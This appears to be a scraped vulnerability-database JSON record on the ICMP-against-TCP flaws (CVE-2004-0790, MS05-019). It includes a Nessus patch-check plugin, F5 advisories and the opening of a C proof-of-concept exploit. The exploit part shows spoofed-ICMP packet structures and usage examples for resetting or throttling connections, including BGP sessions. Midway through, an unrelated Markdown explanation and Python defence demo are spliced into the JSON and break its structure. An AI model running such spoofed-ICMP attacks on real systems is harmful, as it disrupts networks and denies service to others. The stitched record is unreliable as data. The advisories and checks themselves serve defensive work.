script_xref(name:\"CERT\", value:\"415294\");\n script_xref(name:\"EDB-ID\", value:\"276\");\n script_xref(name:\"EDB-ID\", value:\"291\");\n script_xref(name:\"EDB-ID\", value:\"861\");\n script_xref(name:\"EDB-ID\", value:\"948\");\n script_xref(name:\"EDB-ID\", value:\"24030\");\n script_xref(name:\"EDB-ID\", value:\"24031\");\n script_xref(name:\"EDB-ID\", value:\"24032\");\n script_xref(name:\"EDB-ID\", value:\"24033\");\n script_xref(name:\"EDB-ID\", value:\"25383\");\n script_xref(name:\"EDB-ID\", value:\"25388\");\n script_xref(name:\"EDB-ID\", value:\"25389\");\n script_xref(name:\"MSKB\", value:\"893066\");\n\n script_name(english:\"MS05-019: Vulnerabilities in TCP/IP Could Allow Remote Code Execution (893066)\");\n script_summary(english:\"Checks the remote registry for 893066\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host due to a flaw in the\nTCP/IP stack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host runs a version of Windows that has a flaw in its TCP/IP\nstack.\n\nThe flaw could allow an attacker to execute arbitrary code with SYSTEM\nprivileges on the remote host, or to perform a denial of service attack\nagainst the remote host.\n\nProof of concept code is available to perform a Denial of Service\nagainst a vulnerable system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2005/ms05-019\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP and\n2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS05-019';\nkb = '893066';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'3,4', xp:'1,2', win2003:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n hotfix_is_vulnerable(os:\"5.2\", sp:0, file:\"Tcpip.sys\", version:\"5.2.3790.336\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"Tcpip.sys\", version:\"5.1.2600.1693\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n 
hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"Tcpip.sys\", version:\"5.1.2600.2685\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Tcpip.sys\", version:\"5.0.2195.7049\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:C"}}], "f5": [{"lastseen": "2021-06-08T18:49:12", "description": "This vulnerability describes the use of spoofed ICMP packets to affect existing TCP connections. An attacker could cause a TCP connection to be closed or slowed by interfering with the Path MTU Discovery process or by generating one of the following spoofed ICMP messages:\n\n * Destination unreachable\n * Protocol unreachable\n * Port unreachable\n * Fragmentation needed and DF bit set\n\nBIG-IP\n\nF5 Product Development has determined the BIG-IP management interface was affected by this vulnerability. F5 Product Development tracked this issue as CR47296, CR48262, and CR48313 and it was fixed in BIG-IP 9.1. To resolve this issue, upgrade to BIG-IP 9.1 or later. For information about upgrading, refer to the BIG-IP [LTM](<https://support.f5.com/content/kb/en-us/products/big-ip_ltm.html>) release notes.\n\nAdditionally, security updates for versions 9.0.3, 9.0.4, and 9.0.5 that address the management interface vulnerability are available. Download the update, **vu222750_cr47296**, from the F5 [Downloads](<https://downloads.f5.com>) site. 
For information about how to download software, refer to SOL167: Downloading software and firmware from F5.\n\nF5 had initially determined that, due to security enhancements made to the method in which BIG-IP handles ICMP, the BIG-IP Local Traffic Manager was not vulnerable to exploitation of the issues described in VU#222750 / CVE-2004-0790.\n\nHowever, it was later determined that **fastl4** virtual servers are vulnerable. This issue was tracked as ID 356287 and it was fixed in BIG-IP 10.2.3 and in cumulative hotfix BIG-IP 10.2.2 HF2. For information about upgrading, refer to the BIG-IP [LTM](<https://support.f5.com/content/kb/en-us/products/big-ip_ltm.html>) release notes.\n\nFirePass\n\nFirePass 5.0.0 and later are not vulnerable to the attacks described in VU#222750 / CVE-2004-0790.\n\nIn addition to validating source and destination ports and IP addresses, FirePass also validates TCP sequence numbers for TCP headers in an ICMP error packet's payload.\n\nFirePass will discard an ICMP packet if the packet does not contain a sequence number or if the packet contains sequence numbers that are not in the proper range for an existing TCP connection.\n\nAn attack, like the one described in VU#222750, which uses ICMP types such as ICMP Unreachables (type 3) or Source Quench (type 4), with payloads of TCP/IP headers that have only the correct IP address and TCP port pairs, will not prompt FirePass to terminate or slow existing connections.\n", "cvss3": {}, "published": "2007-05-16T00:00:00", "type": "f5", "title": "SOL4583 - Insufficient validation of ICMP error messages - VU#222750 / CVE-2004-0790", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": 
"AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0791", "CVE-2004-0790"], "modified": "2016-07-25T00:00:00", "id": "SOL4583", "href": "http://support.f5.com/kb/en-us/solutions/public/4000/500/sol4583.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-04-06T22:40:33", "description": "\nF5 Product Development has assigned ID 635933 (BIG-IP) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H23440942 on the **Diagnostics** > **Identified** > **Low** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF1 [1] \n12.1.2 HF1 [1] \n11.4.0 - 11.6.1 [1] | Low | Accelerated FastL4 virtual server connection flows on ePVA equipped platforms \nBIG-IP AAM | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF1 [1] \n12.1.2 HF1 [1] \n11.4.0 - 11.6.1 [1] | Low | Accelerated FastL4 virtual server connection flows on ePVA equipped platforms \nBIG-IP AFM | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF1 [1] \n12.1.2 HF1 [1] \n11.4.0 - 11.6.1 [1] | Low | Accelerated FastL4 virtual server connection flows on ePVA equipped platforms \nBIG-IP Analytics | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF1 [1] \n12.1.2 HF1 [1] \n11.4.0 - 11.6.1 [1] | Low | Accelerated FastL4 virtual server connection flows on ePVA equipped platforms \nBIG-IP APM | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF1 [1] \n12.1.2 HF1 [1] \n11.4.0 - 11.6.1 [1] | Low | Accelerated FastL4 virtual server connection flows on ePVA equipped platforms \nBIG-IP ASM | 
13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF1 [1] \n12.1.2 HF1 [1] \n11.4.0 - 11.6.1 [1] | Low | Accelerated FastL4 virtual server connection flows on ePVA equipped platforms \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable | None \nBIG-IP GTM | None | 11.4.0 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP Link Controller | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF1 [1] \n12.1.2 HF1 [1] \n11.4.0 - 11.6.1 [1] | Low | Accelerated FastL4 virtual server connection flows on ePVA equipped platforms \nBIG-IP PEM | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF1 [1] \n12.1.2 HF1 [1] \n11.4.0 - 11.6.1 [1] | Low | Accelerated FastL4 virtual server connection flows on ePVA equipped platforms \nBIG-IP PSM | None | 11.4.0 - 11.4.1 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable | None \nBIG-IP WebSafe | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF1 [1] \n12.1.2 HF1 [1] \n11.6.0 - 11.6.1 [1] | Low | Accelerated FastL4 virtual server connection flows on ePVA equipped platforms \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.1.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.1.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None \n \n[1] The fix in BIG-IP 13.0.0 HF1, 12.1.2 HF1, 11.6.1 HF2, and 11.5.4 HF3 introduces the **Pva.ValidateTcpSeqInICMP** database variable set to a default value of **true**. With this value set to **true**, the BIG-IP system is not vulnerable to CVE-2004-0790. 
However, some specific FastL4 accelerated traffic conditions may require the **Pva.ValidateTcpSeqInICMP** database variable to be configured as **false**. With this value set to **false**, FastL4 virtual server connections are susceptible to CVE-2004-0790.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K12837: Overview of the ePVA feature](<https://support.f5.com/csp/article/K12837>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n", "cvss3": {}, "published": "2017-05-06T01:38:00", "type": "f5", "title": "Insufficient validation of ICMP error messages CVE-2004-0790 (11.x - 13.x)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, 
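The FirePass paragraph in SOL4583 and the Pva.ValidateTcpSeqInICMP footnote in K23440942 both describe the same check: before an ICMP error is allowed to abort or slow a TCP connection, the TCP sequence number quoted in its payload must fall inside what that connection has actually sent. The following Python is an added example written for this page; it is not F5, Tenable or houseofdabus code. It parses a constructed ICMPv4 error (8-byte ICMP header, quoted IPv4 header, first 8 bytes of the quoted TCP header), looks the quoted 4-tuple up in a constructed connection table, and delivers the error once the way the pre-fix stacks did (addresses and ports only, the CVE-2004-0790 behaviour) and once with the sequence-number check of RFC 5927 section 4.1 that the FirePass text and the ePVA fix describe. The addresses, ports, window size, sequence numbers and the hard-as-soft policy option are assumptions made for the demonstration; ICMP and IP checksums are not verified.

```python
"""Added example (not F5, Tenable or houseofdabus code): deliver a spoofed ICMPv4 error
to a TCP connection table with and without the sequence-number check of RFC 5927 sec. 4.1.
All addresses, ports, window sizes and packets below are constructed for the demonstration."""
import socket
import struct
from dataclasses import dataclass

ICMP_DEST_UNREACH = 3
ICMP_SOURCE_QUENCH = 4
ICMP_FRAG_NEEDED = 4           # code under type 3; a "soft" error that only lowers the PMTU
HARD_UNREACH_CODES = {2, 3}    # protocol / port unreachable: "hard" errors, abort per RFC 1122
SEQ_SPACE = 1 << 32


@dataclass
class TcpConn:
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: int
    snd_una: int                # oldest unacknowledged sequence number
    snd_nxt: int                # next sequence number to be sent
    state: str = "ESTABLISHED"

    def in_flight(self):
        """Bytes sent but not yet acknowledged (modulo 2^32)."""
        return (self.snd_nxt - self.snd_una) % SEQ_SPACE


def build_icmp_error(icmp_type, code, orig_src, orig_dst, sport, dport, seq,
                     proto=socket.IPPROTO_TCP):
    """Constructed ICMP error as the victim sees it once the outer IP header is stripped:
    8-byte ICMP header, the quoted IPv4 header, then the first 8 bytes of the quoted TCP
    header (ports and sequence number). The checksum field is left zero here."""
    inner_ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + 8, 0x1234, 0x4000, 64, proto, 0,
                           socket.inet_aton(orig_src), socket.inet_aton(orig_dst))
    inner_tcp = struct.pack("!HHI", sport, dport, seq)
    return struct.pack("!BBHI", icmp_type, code, 0, 0) + inner_ip + inner_tcp


def parse_icmp_error(pkt):
    """Return (type, code, proto, src, dst, sport, dport, seq) of the quoted datagram."""
    icmp_type, code, _cksum, _unused = struct.unpack_from("!BBHI", pkt, 0)
    ihl = (pkt[8] & 0x0F) * 4
    if len(pkt) < 8 + ihl + 8:
        raise ValueError("ICMP payload does not carry 8 bytes of transport header")
    proto = pkt[8 + 9]
    src = socket.inet_ntoa(pkt[8 + 12:8 + 16])
    dst = socket.inet_ntoa(pkt[8 + 16:8 + 20])
    sport, dport, seq = struct.unpack_from("!HHI", pkt, 8 + ihl)
    return icmp_type, code, proto, src, dst, sport, dport, seq


def seq_was_sent(conn, seq):
    """RFC 5927 sec. 4.1: accept only if SND.UNA <= seq < SND.NXT (modulo 2^32)."""
    return (seq - conn.snd_una) % SEQ_SPACE < conn.in_flight()


def handle_icmp_error(conns, pkt, validate_seq=True, hard_as_soft=False):
    """Act on one ICMP error. validate_seq=False reproduces the CVE-2004-0790 behaviour
    (addresses and ports only); hard_as_soft=True additionally ignores hard errors on an
    ESTABLISHED connection, the other RFC 5927 counter-measure (assumed policy here)."""
    icmp_type, code, proto, src, dst, sport, dport, seq = parse_icmp_error(pkt)
    if proto != socket.IPPROTO_TCP:
        return "ignored:not-tcp"
    # The quoted datagram is one *we* sent, so its source is our local endpoint.
    conn = conns.get((src, sport, dst, dport))
    if conn is None:
        return "ignored:no-such-connection"
    if validate_seq and not seq_was_sent(conn, seq):
        return "ignored:seq-outside-window"
    if icmp_type == ICMP_DEST_UNREACH and code in HARD_UNREACH_CODES:
        if hard_as_soft and conn.state == "ESTABLISHED":
            return "ignored:hard-error-treated-as-soft"
        conn.state = "CLOSED"
        return "aborted"
    if icmp_type == ICMP_DEST_UNREACH and code == ICMP_FRAG_NEEDED:
        return "pmtu-reduced"
    if icmp_type == ICMP_SOURCE_QUENCH:
        return "throughput-reduced"
    return "ignored:unhandled"


def expected_spoof_attempts(conn):
    """Mean spoofed packets needed to land one sequence number inside the in-flight
    window when the attacker already knows the 4-tuple."""
    return SEQ_SPACE // max(1, conn.in_flight())


def sample_connections():
    """Constructed table: one BGP session from our router 192.0.2.10 to peer 198.51.100.1."""
    c = TcpConn("192.0.2.10", 179, "198.51.100.1", 51234,
                snd_una=1_000_000, snd_nxt=1_000_000 + 4096)
    return {(c.local_ip, c.local_port, c.remote_ip, c.remote_port): c}


if __name__ == "__main__":
    # Spoofed "protocol unreachable" naming the right endpoints but a guessed sequence
    # number: the kind of packet the HOD PoC's -a:1 mode sends.
    spoof = build_icmp_error(ICMP_DEST_UNREACH, 2, "192.0.2.10", "198.51.100.1", 179, 51234, 7)
    print("ports only :", handle_icmp_error(sample_connections(), spoof, validate_seq=False))
    print("seq checked:", handle_icmp_error(sample_connections(), spoof))
    bgp = next(iter(sample_connections().values()))
    print("mean attempts needed with seq check:", expected_spoof_attempts(bgp))
```

With the check enabled, an attacker who already knows the 4-tuple (trivial for a BGP session on port 179, the case the HOD PoC usage text targets) needs on average 2^32 divided by the in-flight window spoofed packets instead of one, which is why the K23440942 footnote treats setting the variable to false as a return to the vulnerable state. The check does not make in-window guesses impossible, so ignoring hard errors on established connections is the complementary step; both belong in the FastL4 path, because that is where the ePVA hardware, not the host stack, is making the decision.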
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-0066", "CVE-2004-0791", "CVE-2005-0065", "CVE-2004-0790", "CVE-2005-0068", "CVE-2005-0067", "CVE-2004-1060"], "modified": "2019-05-09T00:26:00", "id": "F5:K23440942", "href": "https://support.f5.com/csp/article/K23440942", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T16:39:40", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Multiple Vendor ICMP Implementation Malformed Path MTU DoS", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-79051", "id": "SSV:79051", "sourceData": "\n source: http://www.securityfocus.com/bid/13124/info\r\n \r\nMultiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.\r\n \r\nICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.\r\n \r\nReportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.\r\n \r\nThe following individual attacks are reported:\r\n \r\n- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.\r\n \r\n- An ICMP Source Quench attack. 
This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n \r\n- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n \r\n**Update: Microsoft platforms are also reported prone to these issues. \r\n\r\nhttp://www.exploit-db.com/sploits/25388.tar.gz\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-79051", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T22:34:49", "description": "No description provided by source.", "cvss3": {}, "published": "2005-04-20T00:00:00", "title": "Multiple OS (win32/aix/cisco) Crafted ICMP Messages DoS Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060"], "modified": "2005-04-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15543", "id": "SSV:15543", "sourceData": "\n /* HOD-icmp-attacks-poc.c: 2005-04-15: PUBLIC v.0.2\r\n*\r\n* Copyright (c) 2004-2005 houseofdabus.\r\n*\r\n* (MS05-019) (CISCO:20050412)\r\n* ICMP attacks against TCP (Proof-of-Concept)\r\n*\r\n*\r\n*\r\n* .::[ houseofdabus ]::.\r\n*\r\n*\r\n*\r\n* [ for more details:\r\n* [ http://www.livejournal.com/users/houseofdabus\r\n* ---------------------------------------------------------------------\r\n* Systems Affected:\r\n* - Cisco Content Services 
Switch 11000 Series (WebNS)\r\n* - Cisco Global Site Selector (GSS) 4480 1.x\r\n* - Cisco IOS 10.x\r\n* - Cisco IOS 11.x\r\n* - Cisco IOS 12.x\r\n* - Cisco IOS R11.x\r\n* - Cisco IOS R12.x\r\n* - Cisco IOS XR (CRS-1) 3.x\r\n* - Cisco ONS 15000 Series\r\n* - Cisco PIX 6.x\r\n* - Cisco SAN-OS 1.x (MDS 9000 Switches)\r\n* - AIX 5.x\r\n* - Windows Server 2003\r\n* - Windows XP SP2\r\n* - Windows XP SP1\r\n* - Windows 2000 SP4\r\n* - Windows 2000 SP3\r\n* ...\r\n*\r\n* ---------------------------------------------------------------------\r\n* Description:\r\n* A denial of service vulnerability exists that could allow an\r\n* attacker to send a specially crafted Internet Control Message\r\n* Protocol (ICMP) message to an affected system. An attacker who\r\n* successfully exploited this vulnerability could cause the affected\r\n* system to reset existing TCP connections, reduce the throughput\r\n* in existing TCP connections, or consume large amounts of CPU and\r\n* memory resources.\r\n* (CAN-2004-0790, CAN-2004-0791, CAN-2004-1060)\r\n*\r\n* ---------------------------------------------------------------------\r\n* Solution:\r\n* http://www.microsoft.com/technet/security/Bulletin/MS05-019.mspx\r\n* http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml\r\n*\r\n* Other References:\r\n* http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html\r\n* http://www.kb.cert.org/vuls/id/222750\r\n*\r\n* ---------------------------------------------------------------------\r\n* Tested on:\r\n* - Windows Server 2003\r\n* - Windows XP SP1\r\n* - Windows 2000 SP4\r\n* - Cisco IOS 11.x\r\n*\r\n* ---------------------------------------------------------------------\r\n* Compile:\r\n*\r\n* Win32/VC++ : cl -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\r\n* Win32/cygwin: gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\r\n* Linux : gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\r\n*\r\n* ---------------------------------------------------------------------\r\n* 
Examples:\r\n*\r\n* client <---> router <---> router <---> server\r\n*\r\n* CLIENT <---> SERVER\r\n*\r\n* HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:1\r\n* (abort the connection)\r\n*\r\n* HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:2\r\n* (slow down the transmission rate for traffic)\r\n*\r\n*\r\n* ROUTER1 <---> ROUTER2\r\n*\r\n* HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:179 -a:1\r\n* (DoS Cisco BGP Connections)\r\n*\r\n* HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:80 -a:2\r\n* (slow down the transmission rate for traffic)\r\n*\r\n* ---------------------------------------------------------------------\r\n*\r\n* This is provided as proof-of-concept code only for educational\r\n* purposes and testing by authorized individuals with permission\r\n* to do so.\r\n*\r\n*/\r\n\r\n/* #define _WIN32 */\r\n\r\n#ifdef _WIN32\r\n#pragma comment(lib,"ws2_32")\r\n#pragma pack(1)\r\n#define WIN32_LEAN_AND_MEAN\r\n#include <winsock2.h>\r\n/* IP_HDRINCL */\r\n#include <ws2tcpip.h>\r\n\r\n#else\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <sys/socket.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <sys/timeb.h>\r\n#endif\r\n\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\n#define MAX_PACKET 4096\r\n\r\n#define DEFAULT_PORT 80\r\n#define DEFAULT_IP "192.168.0.1"\r\n#define DEFAULT_COUNT 1\r\n\r\n/* Define the IP header */\r\ntypedef struct ip_hdr {\r\n unsigned char ip_verlen; /* IP version & length */\r\n unsigned char ip_tos; /* IP type of service */\r\n unsigned short ip_totallength; /* Total length */\r\n unsigned short ip_id; /* Unique identifier */\r\n unsigned short ip_offset; /* Fragment offset field */\r\n unsigned char ip_ttl; /* Time to live */\r\n unsigned char ip_protocol; /* Protocol */\r\n unsigned short ip_checksum; /* IP checksum */\r\n unsigned int ip_srcaddr; /* Source address */\r\n unsigned int ip_destaddr; /* Destination 
address */\r\n} IP_HDR, *PIP_HDR;\r\n\r\n/* Define the ICMP header */\r\n/* Destination Unreachable Message */\r\ntypedef struct icmp_hdr {\r\n unsigned char type; /* Type */\r\n unsigned char code; /* Code */\r\n unsigned short checksum; /* Checksum */\r\n unsigned long unused; /* Unused */\r\n} ICMP_HDR, *PICMP_HDR;\r\n\r\n/* 64 bits of Original Data Datagram (TCP header) */\r\nchar msg[] =\r\n"\\x00\\x50" /* Source port */\r\n"\\x00\\x50" /* Destination port */\r\n"\\x23\\x48\\x4f\\x44";\r\n\r\n/* globals */\r\nunsigned long dwToIP, /* IP to send to */\r\n dwFromIP; /* IP to send from (spoof) */\r\nunsigned short iToPort, /* Port to send to */\r\n iFromPort; /* Port to send from (spoof) */\r\nunsigned long dwCount; /* Number of times to send */\r\nunsigned long Attack;\r\n\r\nvoid\r\nusage(char *progname) {\r\n printf("Usage:\\n\\n");\r\n printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> <-fi:SRC-PORT> [-tp:int] [-a:int] [-n:int]\\n\\n", progname);\r\n printf(" -fi:IP From (sender) IP address\\n");\r\n printf(" -ti:IP To (target) IP address\\n");\r\n printf(" -fp:int Target open TCP port number\\n");\r\n printf(" (for example - 21, 25, 80)\\n");\r\n printf(" -tp:int Inicial value for bruteforce (sender) TCP port number\\n");\r\n printf(" (default: 0 = range of ports 0-65535)\\n");\r\n printf(" -n:int Number of packets\\n\\n");\r\n printf(" -a:int ICMP attacks:\\n");\r\n printf(" 1 - Blind connection-reset attack\\n");\r\n printf(" (ICMP protocol unreachable)\\n");\r\n printf(" 2 - Path MTU discovery attack\\n");\r\n printf(" (slow down the transmission rate)\\n");\r\n printf(" 3 - ICMP Source Quench attack\\n");\r\n exit(1);\r\n}\r\n\r\nvoid\r\nValidateArgs(int argc, char **argv)\r\n{\r\n int i;\r\n\r\n iToPort = 0;\r\n iFromPort = DEFAULT_PORT;\r\n dwToIP = inet_addr(DEFAULT_IP);\r\n dwFromIP = inet_addr(DEFAULT_IP);\r\n dwCount = DEFAULT_COUNT;\r\n Attack = 1;\r\n\r\n for (i = 1; i < argc; i++) {\r\n if ((argv[i][0] == '-') || (argv[i][0] == '/')) {\r\n switch 
